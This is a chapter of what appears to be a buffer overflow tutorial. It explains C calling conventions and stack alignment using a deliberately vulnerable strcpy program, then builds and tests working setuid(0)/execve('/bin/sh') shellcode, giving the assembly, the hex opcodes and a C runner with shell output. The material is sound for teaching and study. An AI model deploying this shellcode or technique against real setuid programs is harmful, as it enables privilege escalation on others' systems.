| < Preparing The Vulnerable Environment | BOF Main Page | Vulnerability & Exploit In Action > |


 

 

 

CHAPTER THREE:

C FUNCTION CALL, STACK & THE SHELLCODE

 

 

 

What are in this section?

3.5   C Function Call Convention

3.6   Stack Boundary Alignment

3.7   Generating and Testing the Shellcode as a Payload

 

 

3.5    C Function Call Convention

 

In order to understand how the stack operates, it is very useful to learn the operation of the function call and how the stack frame for a function is constructed and destroyed from programming language perspective.

As a convention, for every C function call [60], [61] there will be a creation of a stack frame. A convention is a followed practice that is standardized, but not a documented and gazetted standard.  Compilers have some conventions used for function call. Actually, this is not just a convention because as discussed in section 2.5.3, the conventions used should be in accordance with the processor’s execution environment. For example, the C function calling convention tells the compiler things such as:

 

1.      The order in which function arguments are pushed onto the stack.

2.      Whether the caller or called function (callee) responsibility to remove the arguments from the stack at the end of the call that is the stack cleanup process.

3.      The name-decorating convention that the compiler uses to identify individual functions.

 

The examples of calling conventions used in C compilers are __stdcall, __pascal, __cdecl and __fastcall (for Microsoft Visual C++).  The calling convention belongs to a function's signature, thus functions with different calling conventions are incompatible with each other.  Currently, there is no standard for C naming between different compiler vendors or even between different versions of compiler for function calling scheme. That is why if the object files compiled with other compiler been linked, may not produce the same naming scheme and thus causes unresolved external.  For Borland and Microsoft compilers a specific calling convention between the return type and the function's name can be specified as shown below.

// Borland and Microsoft

void __cdecl MyFunc(float a, char b, char c);

For the GNU GCC the __attribute__ keyword can be used by writing the function definition followed by the keyword __attribute__ and then state the calling convention in double parentheses as shown below.

// GNU GCC

void  MyFunc(float a, char b, char c)  __attribute__((cdecl));

The following Table summarizes the C function calling conventions used in modern compilers whether commercial or open source.

 

Table 3.1: C function call convention

 

keyword

Stack cleanup

Parameter passing

__cdecl

caller

-         Pushes parameters on the stack, in reverse order (right to left).

-         Caller cleans up the stack.  This is the default calling convention for C language that supports variadic functions (variable number of argument or type list such as printf()) and also C++ programs.

-         The __cdecl calling convention creates larger executables than __stdcall, because it requires each function call to include stack cleanup code.

__stdcall

callee

-         Also known as __pascal.

-         Pushes parameters on the stack, in reverse order (right to left).

-         Functions that use this calling convention require a function prototype.

-         Callee cleans up the stack.

-         It is standard convention used in Win32 API functions.

__fastcall

callee

-         Parameters stored in registers, then pushed on stack.

-         The __fastcall calling convention specifies that arguments to functions are to be passed in registers, when possible.

-         Callee cleans up the stack.

 

Each instance of the function calls will have its own frame (also called activation record in general) on the stack. In general, the type of data which may be available in activation record is shown in Figure 3.14 and Table 3.2 summarizes the data types. A complete general information and specific programming language implementations can be found in [60], [61].

 

A general type of data that might appear in an activation record

Figure 3.14: A general type of data that might appear in an activation record

 

Table 3.2: Activation record data description

 

Data

Description

Temporaries values

Such as yield from the evaluation of expressions, in cases when those temporaries cannot be held in registers.

Local data

Belonging to the function whose activation record is.

A saved machine status

Information about the state of the machine just before the call to the function. Typically includes the return address (value of the program counter, to which the called function must return) and the contents of registers that were used by the caller and must be restored when the return occurs.

An access link

May be needed to locate data needed by the called function but found elsewhere e.g. in another activation record

A control link

Pointing to the activation record of the caller.

Space for the return value

This is for the callee, if any. Again, not all called functions return a value, and if one does, may be preferred to place that value in a register for efficiency.

The actual parameters

Used by the caller. Normally stored in registers, when possible.

 

Specific to C, the code that executed by the caller immediately before and after the function call normally called “calling sequence” subroutine. The code that executed at the beginning of the subroutine normally called prologue and code executed at the end normally called epilogue. Practically, C function calls are made with the caller pushing arguments onto the stack, calling the function and then popping the stack to clean up those pushed arguments.  The following generic assembly code snippets show the __cdecl and __stdcall example and this should tally with the processor’s execution environment for stack setup discussed in section 2.5.3.3.

 

/* example of __cdecl */

push arg_2

push arg_1

call function ; stack frame setup

...

sub ebp, 12   ; allocated buffer

...

add ebp, 12   ; stack cleanup

 

 

/* example of __stdcall */

push arg_2

push arg_1

call function ; stack frame setup

...

sub ebp, 12   ; allocated buffer

...

/* no stack cleanup, it will be done by caller */

 

These assembly snippets explain how the stack frame is constructed during the function call as depicted in Figure 4. Using the __cdecl, the ebp has been subtracted by 12 bytes for the buffer allocation and during the clean up, the 12 bytes will be re-added for the de-allocation. If those calling conventions are not explicitly stated or set, the default, __cdecl will be used as normally used by most programmer. The following Figure shows the default calling convention used in Microsoft Visual Studio IDE.

 

C calling convention setting in Microsoft Visual Studio IDE

 

Figure 3.15: C calling convention setting in Microsoft Visual Studio IDE

 

3.6    Stack Boundary Alignment

 

Back to the vulnerable code, the difference between the real allocated buffer compared to the declared buffer should be noted. In the program, an array of 512 bytes in size was declared that suppose to hold maximum of 512 characters type data. However, depending on the stack growth multiplier of the compiler, the default used is 4 words. By disassembling the source code, this can be verified.

 

 

 

 

 

 

 

 

 

 

 

 

[amad@localhost projectbof11]$ gdb -q bofvulcode

(gdb) disas main

Dump of assembler code for function main:

0x08048424 <main+0>:    lea    0x4(%esp),%ecx

0x08048428 <main+4>:    and    $0xfffffff0,%esp

0x0804842b <main+7>:    pushl  -0x4(%ecx)

0x0804842e <main+10>:   push   %ebp

0x0804842f <main+11>:   mov    %esp,%ebp

0x08048431 <main+13>:   push   %ecx

0x08048432 <main+14>:   sub    $0x214,%esp

0x08048438 <main+20>:   mov    %ecx,-0x208(%ebp)

0x0804843e <main+26>:   mov    -0x208(%ebp),%eax

0x08048444 <main+32>:   cmpl   $0x1,(%eax)

0x08048447 <main+35>:   jg     0x8048470 <main+76>

0x08048449 <main+37>:   mov    -0x208(%ebp),%edx

0x0804844f <main+43>:   mov    0x4(%edx),%eax

0x08048452 <main+46>:   mov    (%eax),%eax

0x08048454 <main+48>:   mov    %eax,0x4(%esp)

0x08048458 <main+52>:   movl   $0x8048584,(%esp)

0x0804845f <main+59>:   call   0x8048344 <printf@plt>

0x08048464 <main+64>:   movl   $0x0,(%esp)

0x0804846b <main+71>:   call   0x8048354 <exit@plt>

0x08048470 <main+76>:   mov    -0x208(%ebp),%edx

0x08048476 <main+82>:   mov    0x4(%edx),%eax

0x08048479 <main+85>:   add    $0x4,%eax

0x0804847c <main+88>:   mov    (%eax),%eax

0x0804847e <main+90>:   mov    %eax,0x4(%esp)

0x08048482 <main+94>:   lea    -0x204(%ebp),%eax

0x08048488 <main+100>:  mov    %eax,(%esp)

0x0804848b <main+103>:  call   0x8048334 <strcpy@plt>

0x08048490 <main+108>:  lea    -0x204(%ebp),%eax

0x08048496 <main+114>:  mov    %eax,0x4(%esp)

0x0804849a <main+118>:  movl   $0x80485a7,(%esp)

0x080484a1 <main+125>:  call   0x8048344 <printf@plt>

0x080484a6 <main+130>:  mov    $0x0,%eax

0x080484ab <main+135>:  add    $0x214,%esp

0x080484b1 <main+141>:  pop    %ecx

0x080484b2 <main+142>:  pop    %ebp

0x080484b3 <main+143>:  lea    -0x4(%ecx),%esp

0x080484b6 <main+146>:  ret

End of assembler dump.

(gdb)

Viewing the ‘real’ allocated buffer for the declared array

 

Figure 3.16: Viewing the ‘real’ allocated buffer for the declared array

 

It is clear that the actual allocated buffer is 0x214 (532 bytes = 532 x 8 bits = 4256/32 = 133 words). The default is 4 (2 power to 2 that equal to 16 bytes or 128 bits) for this GCC version. This default stack growth can be changed by using the following GCC option.

-mpreferred-stack-boundary=num

Which the compiler will attempt to keep the stack boundary aligned to a 2 raised to num byte boundary. As the default, the stack is required to be aligned on a 4 byte boundary. Referring to the GCC documentation:

"To ensure proper alignment of these values on the stack, the stack boundary must be as aligned as that required by any value stored on the stack. Further, every function must be generated such that it keeps the stack aligned. Thus calling a function compiled with a higher preferred stack boundary from a function compiled with a lower preferred stack boundary will most likely misalign the stack. It is recommended that libraries that use callbacks always use the default setting.

This extra alignment does consume extra stack space. Code that is sensitive to stack space usage, such as embedded systems and operating system kernels, may want to reduce the preferred alignment to '-mpreferred-stack-boundary=2'."

This thing is very important if the malicious code will be stored in the stack itself as used in the classic stack-based buffer overflow. The actual allocated buffer for the declared array in the program needs to be known so that the string input size and arrangement can be properly prepared and setup. However, in the case where the return address is pointing back to the stack’s buffer, two options are available:

 

1.      Use the -mpreferred-stack-boundary=num gcc option to lower the preferred stack boundary or

2.      Padding more No Operation (NOP) instruction into the shellcode.

 

In this demo the preferred stack boundary will be lowered to 2. The steps for this task are shown below.

[amad@localhost projectbof11]$ gcc -w -g -mpreferred-stack-boundary=2 bofvulcode.c -o bofvulcode

[amad@localhost projectbof11]$ gdb -q bofvulcode

(gdb) disas main

Dump of assembler code for function main:

0x08048424 <main+0>:    push   %ebp

0x08048425 <main+1>:    mov    %esp,%ebp

0x08048427 <main+3>:    sub    $0x208,%esp

0x0804842d <main+9>:    cmpl   $0x1,0x8(%ebp)

0x08048431 <main+13>:   jg     0x8048454 <main+48>

0x08048433 <main+15>:   mov    0xc(%ebp),%eax

0x08048436 <main+18>:   mov    (%eax),%eax

0x08048438 <main+20>:   mov    %eax,0x4(%esp)

0x0804843c <main+24>:   movl   $0x8048554,(%esp)

0x08048443 <main+31>:   call   0x8048344 <printf@plt>

0x08048448 <main+36>:   movl   $0x0,(%esp)

0x0804844f <main+43>:   call   0x8048354 <exit@plt>

0x08048454 <main+48>:   mov    0xc(%ebp),%eax

0x08048457 <main+51>:   add    $0x4,%eax

0x0804845a <main+54>:   mov    (%eax),%eax

0x0804845c <main+56>:   mov    %eax,0x4(%esp)

0x08048460 <main+60>:   lea    -0x200(%ebp),%eax

0x08048466 <main+66>:   mov    %eax,(%esp)

0x08048469 <main+69>:   call   0x8048334 <strcpy@plt>

0x0804846e <main+74>:   lea    -0x200(%ebp),%eax

0x08048474 <main+80>:   mov    %eax,0x4(%esp)

0x08048478 <main+84>:   movl   $0x8048577,(%esp)

0x0804847f <main+91>:   call   0x8048344 <printf@plt>

0x08048484 <main+96>:   mov    $0x0,%eax

0x08048489 <main+101>:  leave

0x0804848a <main+102>:  ret

End of assembler dump.

(gdb)

Viewing the ‘real’ allocated buffer after lowering the preferred stack boundary

 

Figure 3.17: Viewing the ‘real’ allocated buffer after lowering the preferred stack boundary

 

 

 

 

 

 

 

 

 

 

 

 

Well, 0x208 (520) bytes were allocated for the 512 bytes declared buffer. This issue does not affect the program used in this demonstration because the vulnerable program’s stack is not used to store the malicious shellcode; environment variable will be used instead. However this knowledge is important for determining the exact return address (ebp + 4).

 

3.7    Generating and Testing the Shellcode as a Payload

 

The shellcode used in this demo is a typical setuid and spawning a shell program. Various type of shellcode can be generated easily using the Metasploit framework [52]. Take note that the assembly used is based on AT & T  (AT&T and Intel differences, from RedHat, another one) version. Basically this shellcode contains three parts: displaying some characters, executing setuid(0) and invoking the /bin/sh. To ensure the root privilege of the vulnerable setuid program is retained, the setuid(0) will be run before invoking the /bin/sh. The assembly code (testasm.s) used is shown in the following code listing and it is a modified version of the [62]. The comments should be self-explanatory. The reasons on using the assembly are the small file size and faster execution speed.

# using the .data section for write permission

# instead of .text section

.section .data

.globl _start

 

_start:

     # displaying some characters for watermarking :-)

     xor %eax,%eax      # clear eax by setting eax to 0

     xor %ebx,%ebx      # clear ebx by setting ebx to 0

     xor %edx,%edx      # clear edx by setting edx to 0

     push %ebx          # push ebx into the stack,

# base pointer

                        # for the stack frame

     push $0xa696e55    # push U-n-i characters

     push $0x4d555544   # push M-U-U-D characters

     push $0x414d4841   # push A-M-H-A characters

     movl  %esp,%ecx    # move the sp to ecx

     movb  $0xf,%dl     # move 15 to dl (low d), it is the

                        # string length,

                        # notice the use of movb - move byte,

                        # this is to avoid null

     movb  $0x4,%al     # move 4 to al (low l),

# 4 is system call

                        # number for write(int fd, char *str,

# int len)

     int  $0x80         # call kernel/syscall

     # setuid(0)

     xor %eax,%eax      # clear eax by setting eax to 0

     xor %ebx,%ebx      # clear ebx by setting ebx to 0

     xor %ecx,%ecx      # clear ecx by setting ecx to 0

     movb $0x17,%al     # move 0x17 into al - setuid(0)

     int $0x80          # call kernel/syscall

 

     jmp do_call        # jump to get the address with

                        # the call trick

 

jmp_back:

     pop %ebx           # ebx (base pointer=stack

# frame pointer) has the address

# of our string, use it to index

     xor %eax,%eax      # clear eax by setting eax to 0

     movb %al,7(%ebx)   # put a null at the N or shell[7]

     movl %ebx,8(%ebx)  # put the address of our

# string (in ebx) into shell[8]

     movl %eax,12(%ebx) # put the null at shell[12]

                        # our string now looks something like

                        # "/bin/sh\0(*ebx)(*0000)"

     xor %eax,%eax      # clear eax by setting eax to 0

     movb $11,%al       # put 11 which is execve

# syscall number into al

     leal 8(%ebx),%ecx  # put the address of XXXX

# i.e. (*ebx) into ecx

     leal 12(%ebx),%edx # put the address of YYYY

# i.e. (*0000) into edx

     int $0x80          # call kernel/syscall

 

do_call:

     call jmp_back

 

shell:

     .ascii "/bin/shNXXXXYYYY"

The shellcode file content screenshot

 

Figure 3.18: The shellcode file content screenshot

 

Next, let assemble, link and run the assembly program to verify that the purpose is fulfilled. The following steps show how to assemble, link the object file and run the binary.

[amad@localhost testassembly]$ as testasm.s -o testasm.o

[amad@localhost testassembly]$ ld testasm.o -o testasm

[amad@localhost testassembly]$ ./testasm

AHMADUUMUni

sh-3.2$ pwd

/home/amad/Public/testassembly

sh-3.2$ exit

exit

Look likes the assembly works fine. Next, in order to get the opcodes the object file need to dumped using objdump tool. These opcodes will be used in the next C program as char array of hex. Take note that the assembly code can be used directly in the C program using the asm keyword, however the program will be larger. The following code snippet shows the steps.

[amad@localhost testassembly]$ objdump -D testasm

testasm:     file format elf32-i386

Disassembly of section .data:

 

08049054 <_start>:

 8049054: 31 c0                   xor    %eax,%eax

 8049056: 31 db                   xor    %ebx,%ebx

 8049058: 31 d2                   xor    %edx,%edx

 804905a: 53                      push   %ebx

 804905b: 68 55 6e 69 0a          push   $0xa696e55

 8049060: 68 44 55 55 4d          push   $0x4d555544

 8049065: 68 41 48 4d 41          push   $0x414d4841

 804906a: 89 e1                   mov    %esp,%ecx

 804906c: b2 0f                   mov    $0xf,%dl

 804906e: b0 04                   mov    $0x4,%al

 8049070: cd 80                   int    $0x80

 8049072: 31 c0                   xor    %eax,%eax

 8049074: 31 db                   xor    %ebx,%ebx

 8049076: 31 c9                   xor    %ecx,%ecx

 8049078: b0 17                   mov    $0x17,%al

 804907a: cd 80                   int    $0x80

 804907c: eb 18                   jmp    8049096 <do_call>

 

0804907e <jmp_back>:

 804907e: 5b                      pop    %ebx

 804907f: 31 c0                   xor    %eax,%eax

 8049081: 88 43 07                mov    %al,0x7(%ebx)

 8049084: 89 5b 08                mov    %ebx,0x8(%ebx)

 8049087: 89 43 0c                mov    %eax,0xc(%ebx)

 804908a: 31 c0                   xor    %eax,%eax

 804908c: b0 0b                   mov    $0xb,%al

 804908e: 8d 4b 08                lea    0x8(%ebx),%ecx

 8049091: 8d 53 0c                lea    0xc(%ebx),%edx

 8049094: cd 80                   int    $0x80

 

08049096 <do_call>:

 8049096: e8 e3 ff ff ff          call   804907e <jmp_back>

 

0804909b <shell>:

 804909b: 2f                      das

 804909c: 62 69 6e                bound  %ebp,0x6e(%ecx)

 804909f: 2f                      das

 80490a0: 73 68                   jae    804910a <_end+0x5e>

 80490a2: 4e                      dec    %esi

 80490a3: 58                      pop    %eax

 80490a4: 58                      pop    %eax

 80490a5: 58                      pop    %eax

 80490a6: 58                      pop    %eax

 80490a7: 59                      pop    %ecx

 80490a8: 59                      pop    %ecx

 80490a9: 59                      pop    %ecx

 80490aa: 59                      pop    %ecx

[amad@localhost testassembly]$

 

 

 

 

 

 

 

 

 

 

 

 

 

Dumping the Hex representation using objdump tool

 

Figure 3.19: Dumping the Hex representation using objdump tool

 

Then, re-arrange the opcodes in hex. There must be no null, \x00 (string terminator) in this shellcode which can terminate the execution. In real exploit, the shellcode should be as smaller as possible to exploit the limited space which mostly available for storage and in addition increases the execution speed.

"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"

"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"

"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"

"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"

"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

"\x58\x58\x58\x58\x59\x59\x59\x59"

Next, use this shellcode as a char array in the C program (testmyasm.c) for testing as shown in the following code.

#include <unistd.h>

 

char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"

"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"

"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"

"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"

"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

"\x58\x58\x58\x58\x59\x59\x59\x59";

 

int main(int argc, char **argv)

{

     int (*ret)();      /* creating a function pointer, ret */

     ret = (int(*)())shcode; /* ret points to our shellcode that

                        /* casted to a function */

     (int)(*ret)();     /* execute as function shcode[] */

     exit(0);           /* exit peacefully */

}

Then, compile and run this program as shown in the following steps.

[amad@localhost testassembly]$ gcc -w -g testmyasm.c -o testmyasm

[amad@localhost testassembly]$ ./testmyasm

AHMADUUMUni

sh-3.2$ id

uid=500(amad) gid=500(amad) groups=500(amad)

sh-3.2$ whoami

amad

sh-3.2$

sh-3.2$

sh-3.2$ exit

exit

[amad@localhost testassembly]$

Figure 3.20 shows the screenshot for the previous task.

 

Screenshot for the shellcode testing

 

Figure 3.20: Screenshot for the shellcode testing

 

The shellcode works fine, so the NXXXXYYYY portion after the /bin/sh that just to make it easier for the assembly coding in getting the address of the string and reserving the necessary space can be discarded. By removing the string part of the opcode, the left shellcode is shown below.

"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"

"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"

"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"

"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"

"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

Re-compile and re-run the program with this new little bit 'smaller' shellcode.

[amad@localhost testassembly]$ cat asmshellcodefinal.c

#include <unistd.h>

 

char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"

"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"

"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"

"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"

"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

 

int main(int argc, char **argv)

{

        int (*ret)();

        ret = (int(*)())shcode;

        (int)(*ret)();

        exit(0);

}

[amad@localhost testassembly]$ gcc -w -g asmshellcodefinal.c -o asmshellcodefinal

[amad@localhost testassembly]$ ./asmshellcodefinal

AHMADUUMUni

sh-3.2$

sh-3.2$

sh-3.2$ id

uid=500(amad) gid=500(amad) groups=500(amad)

sh-3.2$ whoami

amad

sh-3.2$ exit

exit

[amad@localhost testassembly]$

Running the shellcode screenshot

 

Figure 3.21: Running the shellcode screenshot

 

Well, the shellcode looks fine.

 

 

 


 

| < Preparing The Vulnerable Environment | BOF Main Page | Vulnerability & Exploit In Action > |